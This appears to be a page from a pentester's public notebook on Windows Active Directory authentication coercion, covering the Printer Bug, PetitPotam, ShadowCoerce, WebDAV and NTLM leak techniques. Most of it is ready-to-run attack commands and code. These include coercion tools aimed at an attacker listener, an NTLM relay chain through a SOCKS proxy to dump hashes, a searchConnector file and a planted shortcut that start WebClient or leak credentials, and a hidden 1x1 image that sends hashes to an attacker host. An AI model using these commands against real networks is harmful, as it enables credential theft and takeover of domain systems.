Pentester's Promiscuous Notebook
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2
      • Covenant
      • Empire
      • Havoc
      • Meterpreter
      • PoshC2
      • Sliver
    • Infrastructure
      • AD
        • ACL Abuse
        • AD CS Abuse
          • dNSHostName Spoofing (Certifried)
          • ESC1
          • ESC4
          • ESC8
          • ESC15
          • Golden Certificate
          • Pass-the-Certificate
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasion
          • .NET Assembly
            • .NET Config Loader
            • .NET Dynamic API Invocation
            • .NET In-Memory Assembly
            • .NET Reflective Assembly
          • AMSI Bypass
          • Application Whitelist Bypass
          • AppLocker Bypass
          • BYOVD
          • CLM Bypass
          • Defender
          • ETW Block
          • Execution Policy Bypass
          • Mimikatz
          • UAC Bypass
        • Authentication Coercion
        • BadSuccessor
        • Credentials Harvesting
          • From Memory
            • lsass.exe
            • svchost.exe
          • Credential Phishing
          • DCSync
          • DPAPI
          • KeePass
          • Linux
          • LSA
          • NetSync
          • NPLogonNotify
          • NTDS
          • Password Filter
          • RDP
          • SAM
          • SSH Clients
          • SSPI
        • Discovery
        • DnsAdmins
        • Dominance
        • GPO Abuse
        • Kerberos
          • Delegation Abuse
            • Constrained
            • Resource-based Constrained
            • Unconstrained
          • Kerberos Relay
          • Roasting
        • Key Credentials Abuse
        • LAPS
        • Lateral Movement
          • DCOM
          • Overpass-the-Hash
          • Pass-the-Hash
          • Pass-the-Ticket
          • RDP
          • RPC
          • RunAs
          • SMB
          • SPN-jacking
          • WinRM / PSRemoting
          • WMI
        • LDAP
        • NTLM
          • NTLM Relay
          • NTLMv1 Downgrade
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abuse
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilege
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure AD
        • On-Prem ↔ Cloud
          • Cloud → On-Prem
          • On-Prem → Cloud
        • PRT Abuse
      • DevOps
        • Ansible
        • Artifactory
        • Atlassian
        • Containerization / Orchestration
        • GitLab
        • HashiCorp Vault
        • Jenkins
        • VS Code
        • Zabbix
      • DBMS
        • FireBird
        • MS SQL
        • MySQL / MariaDB
        • Oracle
        • Redis
        • SQLite
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networks
        • L2
          • ARP Spoofing
          • DHCPv6 Spoofing
          • LLMNR / NBNS Poisoning
          • SNACs Abuse
          • VLAN Hopping
        • NAC Bypass
        • Scanning
        • SIP / VoIP
        • Sniff Traffic
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINT
      • Shodan
    • Password Brute Force
      • Generate Wordlists
    • Perimeter
      • 1C
      • ADFS
      • Cisco
      • DNS
      • Exchange
      • Information Gathering
      • IPSec
      • Java RMI
      • Log4j / Log4Shell
      • Lync & Skype for Business
      • NTP
      • Outlook
      • OWA
      • SharePoint
      • SMTP
      • SSH
      • Subdomain Takeover
    • Shells
      • Reverse Shells
      • Web Shells
    • Web
      • 2FA Bypass
      • LFI / RFI
      • SOP / CORS
      • SQLi
      • WAF
      • WordPress
      • XSS
    • Wi-Fi
      • WPA / WPA2
        • Enterprise
        • Personal
  • ⚔️Red Team
    • Basics
    • Cobalt Strike
      • UDRL
    • Infrastructure
    • MalDev
      • API Hashing
      • API Hooking
      • BOF / COFF
      • CFG
      • Code Injection
        • DLL Injectors
        • Process Hollowing
        • Process Injectors
        • Shellcode Runners
      • DLL Hijacking
      • Golang
      • Kernel Mode
      • PIC / Shellcode
      • Nim
      • Sandbox Evasion
      • Syscalls
      • Windows API
    • SE
      • Phishing
        • HTML Smuggling
        • MS Office
        • Rogue RDP
  • 🐞Exploit Dev
    • BOF
      • OSCP BOF
      • OSED SEH Overflow
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linux
      • Kali
    • Networking
      • DHCP Server & Linux Hotspot
      • Quick Configurations
      • Routing
      • WireGuard
    • Virtualization
      • Docker
      • Hyper-V
      • VirtualBox
      • VMWare
    • Windows
Powered by GitBook
On this page
  • Printer Bug (MS-RPRN)
  • SpoolSample
  • dementor.py
  • printerbug.py
  • PetitPotam (MS-EFSR)
  • Theory
  • Mitigation
  • ShadowCoerce (MS-FSRVP)
  • EvilentCoerce (MS-EVEN)
  • WebDAV (WebClient)
  • Enable WebClient
  • CVE-2022-30216
  • NTLM Leak
  • Tools
  • Coercer
  1. Pentest
  2. Infrastructure
  3. AD

Authentication Coercion

Last updated 18 days ago

It's a good idea to check if NTLMv1 downgrade is possible when triggering the callbacks.

Printer Bug (MS-RPRN)

Check if Spooler is running via Remote Registry:

$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR

SpoolSample

Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt

dementor.py

$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local

printerbug.py

$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt

PetitPotam (MS-EFSR)

CVE-2021-36942

$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1

PetitPotam any host (not only a DC with null sessions allowed for the IPC$ share) without initial creds via proxying through an authenticated session on behalf a DC-relayed machine account:

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./Responder.py -I eth0 -vA 
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11

NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EX1 as DC1$ ➡️ NTLM Relay to EXCH2 to dump hashes

With Kerberos authentication:

$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local

Theory

Mitigation

ShadowCoerce (MS-FSRVP)

$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11

EvilentCoerce (MS-EVEN)

WebDAV (WebClient)

Check via PowerShell:

PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'

Check via CME:

$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put the .searchConnector-ms file on a writable share. When a domain user opens target folder in explorer, the WebClient service should start automatically:

Documents.searchConnector-ms
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>

CVE-2022-30216

NTLM Leak

Leak with PowerShell:

PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)

Leak with rpcping (catch with Responder's DCE-RPC listener):

Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM

Leak with a hidden image:

<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />

Leak with a shortcut:

lnk.ps1
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()

Leak with curl:

Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html

Tools

Coercer

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1

Check if callback via WebDAV (HTTP) is possible. It is when the WebClient service is running. If it's possible, then on behalf of the relayed machine account is your chance for .

Check via :

Leak :

⚒️
https://github.com/leechristensen/SpoolSample
https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1
https://github.com/0x00ach/stuff/blob/master/MS-RPRN.exe
https://github.com/BeetleChunks/SpoolSploit
https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc
https://https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
https://github.com/topotam/PetitPotam
https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-Petitpotam.ps1
https://gist.github.com/leechristensen/fda130890fb3c194115e7b856640c30e
https://github.com/ly4k/PetitPotam
https://www.tiraniddo.dev/2021/08/how-windows-firewall-rpc-filter-works.html
https://www.tiraniddo.dev/2021/08/how-to-secure-windows-rpc-server-and.html
https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
https://itm4n.github.io/from-rpcview-to-petitpotam/
https://clearbluejar.github.io/posts/from-ntobjectmanager-to-petitpotam/
https://kb.cert.org/vuls/id/405600
https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
https://github.com/zeronetworks/rpcfirewall
https://pentestlaboratories.com/2022/01/11/shadowcoerce/
https://github.com/ShutdownRepo/ShadowCoerce
https://habr.com/ru/companies/tomhunter/articles/907068/
https://github.com/Thunter-HackTeam/EvilentCoerce
https://pentestlab.blog/2021/10/20/lateral-movement-webclient/
https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
https://github.com/Hackndo/WebclientServiceScanner
NTLM Relay to LDAPS
RBCD workstation takeover
GetWebDAVStatus
https://www.akamai.com/blog/security/authentication-coercion-windows-server-service
https://github.com/akamai/akamai-security-research/tree/main/cve-2022-30216
https://github.com/xct/hashgrab
https://github.com/Gl3bGl4z/All_NTLM_leak
with Python
https://github.com/p0dalirius/Coercer
https://github.com/p0dalirius/windows-coerced-authentication-methods
https://habr.com/ru/post/688682/
NTLMv1 Downgrade
https://twitter.com/DebugPrivilege/status/1410158556540719104twitter.com